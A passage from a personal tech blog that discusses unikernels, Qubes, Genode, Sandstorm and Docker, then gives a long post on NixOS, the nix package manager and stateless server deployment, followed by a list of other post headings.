But if your application can fit in that model, the benefits are pretty exciting. Your entire OS is stateless. Your deployment process is literally just stopping one VM and starting another. And that may sound expensive, but these unikernels are in the order of tens of kilobytes - they can start up quicker than a docker container. You get the benefits of OCaml’s excellent type system and memory safety across your entire OS (no buffer overflows), along with an incredibly small attack surface (no random binaries or C libraries that were written before the internet with the belief that there is no such thing as malicious input). If there’s one thing this year has taught me, it’s that just because code is old and widely used, doesn’t mean it can’t be terribly insecure.

Obviously, writing code in OCaml doesn’t implicitly fix security bugs (aside from memory safety bugs, which is nothing to sneeze at). But the most efficient and least buggy code is code which doesn’t exist, and MirageOS can effectively trim off decades of crusty code, if you can work within its fairly strict requirements. To be honest, I haven’t actually used it myself - I’m keen, but given the restrictions I haven’t yet had anything appropriate to try it out with.

And if OCaml isn’t your thing, there are unikernels in various stages of development for haskell, the JVM, erlang and go.

Qubes OS

The complete lack of isolation in everyday computing is incredibly alarming. I have many things that I do on and offline - programming, work, banking, playing with new programs and tools, building software, playing games. I would be much more comfortable if (for example) some fun little game I’m trying out were not given full access to my entire user account, which could fairly trivially compromise all of the above without actually needing to subvert any security measures. Obviously when trying out suspicious software I’ll do it in a VM or with an unprivileged user account, but that’s a lot of work, and is very inconvenient.

From what I’ve seen, Qubes could be a much more convenient approach to at least maintaining some walls between activities that clearly have no business interacting with each other (e.g online banking and playing games). On the downside, I believe it comes at a fairly hefty performance (particularly RAM) cost, doesn’t provide the 3D acceleration required for gaming, and doesn’t allow much choice when it comes to the window manager (I use gnome-shell with a tiling window plugin, while Qubes uses KDE which I don’t much care for). While criticizing the window manager of a security oriented OS is clearly missing the point, it’s still going to put me off using it as my primary OS.

So despite the fact that I haven’t use Qubes, I’m hopeful that one day it could be convenient (and efficient) enough to provide vastly better security than we currently put up with.

Genode

While Qubes is A Thing That Could Work Right Now (with some annoyances), Genode feels like a thing that could be truly amazing in a handful of years’ time. And once it is generally useful, it would hopefully supersede the current half-measures like Qubes’s VM-based separation (which is not a slight on Qubes; it’s clearly more practical right now).

While Qubes requires on the user organising their actions into explicit categories (“work”, “games”, etc), Genode is instead a capability-based model. The basic idea here is that instead of having ambient authority like a regular OS (things like a heirarchical file system, network stack or inter-process-communication) which any running process can access using well-known methods, a process in a capability-based system can access only the resources that are explicitly passed to it. It’s kind of like in programming, where instead of passing a file path around and allowing anyone to access any file they wish, you might pass a very restrictive File object instead. Except that in this analogy, it would be impossible to access the filesystem outside of individual references passed to you, making it very explicit which files a procedure can access. Doing this for anything involving authority allows you to keep processes isolated on a very granular level, by only providing them capabilities to the services / powers they actually need, rather than trying to design system-wide security policies like current OSes do.

I’ve been following this for a while, but it’s a fairly low-level project compared to where I usually spend my time, so it’s hard for me to do much with. I don’t have much love for C++ (in which the entire OS is built), and releases are still featuring low level things like improved USB & networking stacks, filesystem drivers, etc. So while I’m very interested to see where the OS goes, it’s only from the sidelines, as I can’t really do much with it myself.

Honourable mention: Sandstorm.io

I’ve never been terribly fond of the notion that everything should be a web app, any more than the notion that all code should be javascript. But web apps have proven extremely useful in their variety, stability and portability. So much so that some native applications end up being delivered as a web server + chromeless webkit component.

Sandstorm normalizes this approach, and provides a way for users to easily run their own web services under their own control, completely sandboxed from each other and the rest of the user’s computer. It’s an interesting direction, and provides a path for users to take control of some hosted services (e.g for things like self-hosted RSS apps). But anything that’s not single-user is going to have to be heavily federated in order to work with sandstorm’s model, and I don’t think that’s terribly likely (especially if you’re dealing with federated “servers” that disappear when a user suspends their computer).

Interestingly, the core model of sandstorm (running isolated web services) is also something that I think could be completely superceded by genode, if it were to take off as a general-purpose OS Presumably that’s a long-to-infinite time away, though.

And hey, they’re talking about capability-based security for web applications, and that would definitely be an interesting development if it took off.

Less-honourable mention: Docker

I want to love docker, I really do. I was very excited when it was first announced. I’ve long been a fan of the underlying LXC technologies it uses for isolation. But it’s pretty clear now that its features are aimed just a little too far away from what I would actually want.

I do use it. But never in the way that docker seems to want me to, which is a little awkward. The main push of docker seems to be for completely self-contained applications, basically a super cheap and consistent VM. But VMs are a hack, and docker in many ways is just as hacky. Why would I want an operating system (e.g RHEL) on my host, and a different operating system (perhaps Ubuntu) inside the docker container? I can’t run systemd inside docker¹, so all of the Nice Things that you get with systemd need to be replaced with fairly weak alternatives (like supervisord). And unlike nix, docker’s caching is optimistic (a.k.a “wrong”). You’ll rarely ever get the same actual result with the same build inputs, because docker containers rely on doing very time-relevant things like installing or updating to the “latest version” of some package. And making sure important security updates are applied to a docker container is often even harder than it is for a VM.

And then because you need a lot of containers, suddenly you need cluster management on top of your docker containers. I’ve looked at a few of these, and they’re not really appealing to me. It’s kind of like running OpenStack - a pretty huge amount of additional effort, resources and (not entirely bug-free) code which in most small deployments will just cause you more hassle than they solve.

Interestingly, nixos has some container functionality. But because it’s built on nixos itself, almost all of what docker provides is completely unnecessary - specifying a container is just like specifying the OS, because that’s already completely stateless and declarative. You don’t need a way to build a root filesystem, because nixos already does that. You don’t need a way to cache the results of a build and overlay them, because nixos already does that (but without needing the overlay part). And you don’t need special tricks to apply security updates - the host and container are running the same OS; rebuilding the host also rebuilds the container (but without any actual duplication, thanks to nix’s pervasive caching).

So while I’ll still use docker for development (e.g a cheap way to test software on an Ubuntu-like environment), I’m no longer excited about where Docker is going.

Update (06/01/2015): It’s been pointed out in the comments that you can run systemd inside docker. I tried and failed in the past, but I think things have gotten better since. ↩

NixOS and Stateless Deployment

2015-01-03T00:00:00+11:00

If I had my way, I would never deploy or administer a linux server that isn’t running NixOS.

I’m not exactly a prolific sysadmin - in my time, I’ve set up and administered servers numbering in the low tens. And yet every single time, it’s awful.

Firstly, you get out of the notion of doing anything manually, ever. Anytime you do something manually you create a unique snowflake, and then 3 weeks (or 3 years!) down the track you tear your hair out trying to recreate whatever seemingly-unimportant thing it is you did last time that must have made it work.

So you learn about automated deployment. There are no shortage of tools, and they’re mostly pretty similar. I’ve personally used these, and learned about many more in my quest not to have an awful deployment experience:

All of these work more or less as advertised, but all of them still leave me with a pretty crappy deployment experience.

The problem

Most of those are imperative, in that they boil down to a list of steps - “install X”, “upload file A -> B”, etc. This is the obvious approach to automating deployment, kind of like a shell script is the obvious approach to automating a process. It takes what you currently do, and turns it into one or more concrete files that you can modify and replay later.

And obviously, the entire problem of server deployment is deeply stateful - your server is quite literally a state machine, and each deployment attempts to modify its current state into (hopefully) the expected target state.

Unfortunately, in such a system it can be difficult to predict how the current state will interact with your deployment scripts. Performing the same deployment to two servers that started in different states can have drastically different results. Usually one of them failing.

Puppet is a little different, in that you don’t specify what you want to happen, but rather the desired state. Instead of writing down the steps required to install the package foo, you simply state that you want foo to be installed, and puppet knows what to do to get the current system (whatever its state) into the state you asked for.

Which would be great, if it weren’t a pretty big lie.

The thing is, it’s a fool’s errand to try and specify your system state in puppet. Puppet is built on traditional linux (and even windows) systems, with their stateful package managers and their stateful file systems and their stateful user management and their stateful configuration directories, and… well, you get the idea. There are plenty of places for state to hide, and puppet barely scratches the surface.

If you deploy a puppet configuration that specifies “package foo must be installed”, but then you remove that line from your config at time t, what happens? Well, now any servers deployed before t will have foo installed, but new servers (after t) will not. You did nothing wrong, it’s just that puppet’s declarative approach is only a thin veneer over an inherently stateful system.

To correctly use puppet, you would have to specify not only what you do want to be true about a system, but also all of the possible things that you do not want to be true about a system. This includes any package that may have ever been installed, any file that may have ever been created, any users or groups that may have ever been created, etc. And if you miss any of that, well, don’t worry. You’ll find out when it breaks something.

So servers are deeply stateful. And deployment is typically imperative. This is clearly a bad mix for something that you want to be as reproducible and reliable as possible.

Puppet tries to fix the “imperative” part of deployment, but can’t really do anything about the statefulness of its hosts. Can we do better?

Well, yeah.

`nix`, the purely functional package manager

It started with nix, the “purely function package manager”. From the description, you can tell that nix is not your standard package manager. Most packaging systems consist of thousands of individual packages, referenced by some package id / name, with loose versioning requirements on other packages in the repository (e.g “libfoo >= 2.3.1 <2.4”). This has worked well for OSS distributions for a long time, and it’s a pretty versatile model. But nix is different. It is not a collection of packages, each with multiple versions. It is a single, monolithic expression defined in a functional, lazy, purpose-built language.

So you don’t have a package named git. You have “the entire set of packages” (usually named pkgs), and you can access its git property, which is a specific version of git. For git, there is only one version. For other tools (like python), there are multiple different attributes for different minor versions (e.g. pkgs.python is an alias to pkgs.python2, which itself is an alias to pkgs.python27).

Okay, but why?

So far, this is not functionally different to standard package management. After all, my fedora box has explicit python2 and python2.7 packages too. But one difference is that traditional packages are global, and not user-serviceable. Say that (for whatever reason), you needed python2.7 with some additional patch. Since the entire package space exists in one expression, you can manipulate it in very flexible ways. For example:

# my-python.nix
{ pkgs }:
let base = pkgs.python27;
in base // {
	patches = (base.patches or []) ++ [ ./my-python.patch ];
}

Even if you’ve never read a nix expression before, you can probably guess what that does. It defines a function which takes an argument named pkgs. It binds the local variable base to pkgs.python27. And it defines the result to be base with a single overridden patches attribute (the // operator merges two attribute sets). This just takes whatever patches the base expression has (if any), and adds the my-python.patch file. patches is a standard attribute - a list of patch files which will be applied to the source before building. So now we have a python package which is identical to the official package with just a tiny modification. We didn’t have to set up our own repository, or figure out how to make a modified .rpm from our distro’s sources.

Thankfully, I’ve never needed to run a patched version of python on a production server. But I have needed to experiment with prerelease versions of etcd on a test server, and nix makes substituting official packages for modified versions pretty trivial.

The right dependency for the job

Another interesting outcome of the packages being defined in a proper programming language is that package sets can be parameterised. Often, python libraries are version-independent - the same code will work just fine in multiple minor versions of python (e.g 2.6, 2.7), sometimes even major versions (2.x and 3.x). But any modules that requires compilation must be compiled against the minor version of python that they’ll be used with. And python is pretty good at its ABI guarantees - other runtimes (like ocaml or haskell) have extremely delicate ABIs which generally mean you must compile against the exact runtime and libraries that you’ll be using at runtime.

For nix, this happens automatically. Each python package is actually a function which takes (amongst other things) the python implementation in use. This could be pkgs.python, pkgs.python27 or even my-python (that we made above). Because each python package has a build-time dependency on the exact python version used, you will never have ABI or other incompatibilities that come from using a different version at build time than run time.

And to make sure that the python version used at compile time is also used at runtime, nix doesn’t use the concept of a globally-installed python interpreter. When you pass a python implementation to a nix function, that function will actually see python as living at a path like /nix/store/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-python/bin/python (and will hard-code this path wherever needed, instead of e.g. /usr/bin/python). The xxxxxxxxs are a cryptographic hash of the inputs used to define this python implementation. Since nix is pure¹, the same inputs will produce the same output. This means the above path is immutable, which is good for both caching and consistency. And because each nix build output lives in a unique path under /nix/store, you never run into name clashes - you can have as many simultaneous versions of python (or anything else) as your system needs, although you’ll generally end up with just one or two in practice.

Hardcode all the things

This definitely has some inefficiencies. For one, overriding the “default” python to the one we defined above will cause every python package that you use with it to be rebuilt, because the inputs used to build python are slightly different from the officially-built packages. On the other hand, there is no way for nix to tell whether a given change affects the ABI (or API) of an implementation. The only safe thing that nix can do is to rebuild in this case, which means nix will rebuild things when it doesn’t necessarily need to, but on the other hand it never has to worry about ABI incompatibilities. Distributions are more efficient here by only rebuilding when necessary, but at the cost of a fair bit of manpower, runtime-specific knowledge, and sometimes getting it wrong.

Because a nix implementation hardcodes paths to all its dependencies as paths under /nix/store, it’s actually incredibly easy to compute the closure of a given implementation - that is, every other implementation that it references, transitively. This means that if you build something locally, you can run nix-copy-closure <path> <remote-machine> to have that exact implementation, and all of its transitive dependencies, copied to a remote machine. This is obviously tremendously useful for deployment, as you can be sure that each machine will receive the exact same results, without having to deal with time-related inconsistencies (like running apt-get update at different times on different machines). It’s also extremely efficient - nix store paths are unique and immutable, so any store path that already exists doesn’t need to be copied (or even re-checked).

The payoff: NixOS

But I haven’t even got to the most amazing part of nix yet: NixOS. NixOS came from the desire to extend nix’s features from “package management” to “the entire machine”.

With nix, every derivation (output) is pure - given the same set of inputs, you get the same output. And what’s more, the inputs are described in one language (also called nix), which is functional and strongly typed. So if you could define an entire machine using the nix language, and somehow run it, it would be like puppet on steroids - the state of the entire machine would be pure - applying a given config would always produce the same result, regardless of the previous state of the machine. This is exactly what NixOS does, and it works amazingly well.

Why is it better than those other declarative systems?

It should hopefully be obvious at this point why NixOS is better than puppet: Both are declarative, but puppet is impure and non-exhaustive - when you apply a config, puppet compares everything specified against the current state of the system. Everything not specified is left alone, which means you’re only specifying a very tiny subset of your system. With NixOS, if something is not specified, it is not present. This includes configuration files, packages, even users and groups. So NixOS is pure, declarative and exhaustive. In fact, due to nix’s purity and pervasive caching, “rebuilding the entire OS” with NixOS is often quicker than reapplying a relatively simple puppet config.

Puppet is not the only declarative system though - docker is declarative and exhaustive. It’s obviously a bit of an apples to oranges comparison (like comparing Ubuntu to VirtualBox), but the similarities are still interesting:

Building a docker image starts with a well-known state (e.g a vanilla Ubuntu-LTS image), and the steps in a Dockerfile are simply executed sequentially. When you rebuild the Dockerfile it doesn’t try and get you from the current state to the new state, it just throws away the current state and rebuilds the new state from scratch. Of course, it also uses caching so that you don’t have to wait half an hour to rebuild stuff that you haven’t changed. Unfortunately for docker, its caching mechanism is “usually good enough”, a.k.a “sometimes catastrophically broken” if you aren’t aware of its impurities².

So docker is both declarative and exhaustive, but its impurities still cause issues and inconsistencies between builds (as well as a lot of redundant work when rebuilding, which can be very slow). Also, because you’re pretty much running two OSes (guest and host), you need to deal with all of those issues too (in particular, making sure security updates are applied on both systems). And once you have a docker container, you still need to worry about the environment in which you’re running it, which docker doesn’t address at all.

Lumps of impurity

Of course, not everything should be stateless. If you have a database server and you change its configuration, you really do want it to keep some state around (the database!). But NixOS keeps the “OS” parts of the machine stateless, meaning that the only state you need to manage is that which you create yourself. From the top of my head (not an exhaustive list):

/var, /tmp, /run: stateful, unmanaged
each user’s $HOME directory: stateful, unmanaged (rarely used on a server, though)
Users & Groups: stateless
Installed software: stateless
Installed services (using systemd): stateless
All program configuration (i.e all of /etc): stateless³
Kernel & kernel modules, grub configuration: stateless (but requires a reboot to activate)
Disk mounts: stateless

By “stateless”, I mean that the given item is generated entirely from the pure nix expression of the system, and isn’t affected by any previous state.

NixOS also uses a bunch of impure technology under the hood, e.g when applying a new set of installed services, it still needs to look at the current installed services in order to tell systemd to stop & remove services that are not in the new system config. But this is fully automated, and the typed, single-language nature of using nix as the only configuration mechanism means that this is not a very complex task, and is generally bug-free.

The bootstrapping problem

Bootstrapping a system is always going to be different to updating a system. Many tools deal with only one side of this equation - e.g many deployment tools will allow you to provision a machine from some base image, but you’ll have to use something else (perhaps ansible or puppet) to keep that machine up to date. And in the space between, you probably need to do some custom scripting to install puppet itself, or set up admin users with appropriate SSH keys.

Nix can’t remove the difference between bootstrapping and updating, but it can dramatically reduce it. I won’t go too deeply into this right now (this post is already rather long), but one important thing about NixOS is that you can build a machine’s configuration locally, and then just push it to the actual machine using nix-copy-closure. Once pushed, a new root can be made active with a single nix command.

When bootstrapping, obviously you don’t yet have a remote machine running NixOS to push to yet. But that doesn’t mean you have to use completely different tools. Under the hood, the root filesystem of a NixOS machine lives as an attribute of your system config: <config>.system.build.toplevel. But there are other options - if you instead build <config>.system.build.virtualBoxImage, out will pop a VirtualBox image for that system instead. Similar attributes exist for producing an EC2 image, a LXC container, an OpenStack Nova image, and plenty more. So instead of starting from some vanilla NixOS image and then deploying your system over the top (which can be be difficult since things like SSH keys and additional users won’t be set up), you can use nix to build a fully-formed image and deploy that directly.

Unfortunately, the stuff I just described is not (yet) very accessible to new users. Right now, it’s probably better to follow the manual install instructions (which are a bit tedious) when you’re just starting out, as it is much simpler to understand what’s going on.

… so should I use it?

NixOS is not yet for the faint of heart. It’s probably very different from what you’re currently using, and you can’t step into it gradually (it’s NixOS or null). Debugging system config can occasionally be tricky, since you can’t just go in an modify a file directly - most of the OS is mounted readonly, forcing you to make modifications properly (i.e. via nix config). This is clearly what you want for deployed machines, but can be frustrating during development.

There’s also the question of security updates. There are (I believe) enough NixOS machines running in production that the nixpkgs folks are pretty keen to apply security updates ASAP, but they will probably never be as responsive as the bigger distros. And there is of course much less manpower available to test the stability of updates. But these are both network effects, which ill hopefully improve the more people use it.

So if you’re game, do give it a try. Once you’ve got the hang of it, I doubt you’ll ever want to go back to deploying a “normal” linux distribution. I certainly don’t.

And if you can’t yet commit to NixOS, maybe give nix itself a try. You can install it on Linux and OSX, and won’t interfere with any system software. It can be quite a useful tool for managing consistent development environments, and is a good way to ease into how nix works without jumping straight into NixOS.

Technically, nix is not completely pure. But there are very few sources of impurity, none of which should be a problem for the standard set of packages nixpkgs. If your own build process is sensitive to the current temperature, you probably have bigger issues than build impurity. ↩
A problematic example: running apt-get update && apt-get upgrade will apply security fixes the first time it is built, but docker will use that cached result in the future (even if it’s months old). This makes it hard to be sure that a docker image actually includes the latest security updates. ↩
There is a minor edge case where files in /etc that require special permissions (like 600 for /etc/suders.d/) may remain after being removed from the configuration. As long as you don’t need to make your own files in /etc with particular permissions, this won’t affect you. ↩

GFX::Monk

Concurrent ML and Koka

Koka and concurrency:

Koka and parallelism:

Implementing CML primitives in Koka

Cancellation in asynchronous code

Cancellation in CML (Concurrent ML)

What is this?

Why doesn’t all async code have an opstate?

CML cannot compose operations

Most operations don’t need to be atomic

… But atomic operations should be completable by non-atomic ones

What would this look like in Koka?

Alternative design: enforce single operations

Summing up:

I'm excited about Koka

Koka?

Where I’m coming from

OCaml

Rust

Scala

Koka: Functional Programming with algebraic effects

Algebraic effects: power

Algebraic effects: usage

Effects: no more referential transparency?

Other features

No Garbage Collector

Dot selection

Qualified names and overloading

Implicit arguments

Cohesion and simplicity

Performance

Koka: the hard parts

You can’t refer to generic type parameters in the function body

Local variables interfere with dot selection

Matching up effect types can be hard

Compiler bugs

Summary

Nix remains my superpower

Do niche things, encounter niche bugs

Do symlinks even have permissions?

Testing changes

1. Make the change

2. Integrate it into nix

3. Test it

Integrating changes

Eliminating the Software Distribution Chasm

Indoor Skydiving

Nix cross-compilation: what even is it?

What is nix?

What is cross-compilation?

Dependency injection

The Nix package universe

Different stdenvs

The Nix package universe multiverse

Is this novel?

Ok so how do I actually… cross compile stuff?

runix: run nix software without nix

Runix

Introducing chored

“Like Github actions?”

“Oh, like a rake task. Or an NPM task. Or [plenty more task runners]”

Lightweight, stateless dependency management:

Lightweight abstraction:

Types!

Files!

Background - how I got here:

nix-wrangle: Manage nix sources and dependencies with ease

Update:

Step 7: nix-wrangle for development, dependency management and releases

A journey towards better nix package development

Update:

Purpose 1: Inclusion in nixpkgs proper

Purpose 2: Allowing easy updates

Purpose 3: Standalone development (i.e. as part of the project being built)

Purpose 4: Inter-project development

Attempts I’ve made in the pursuit of a perfect workflow

Step 1: Nothing fancy

Step 2: Scripted updates

Step 3: Anonymous git SHAs

Introducing `chored`

2: You want to capture stdout as a string (and inherit `stderr`):

4: You need to inherit `stdin`

`nix`, the purely functional package manager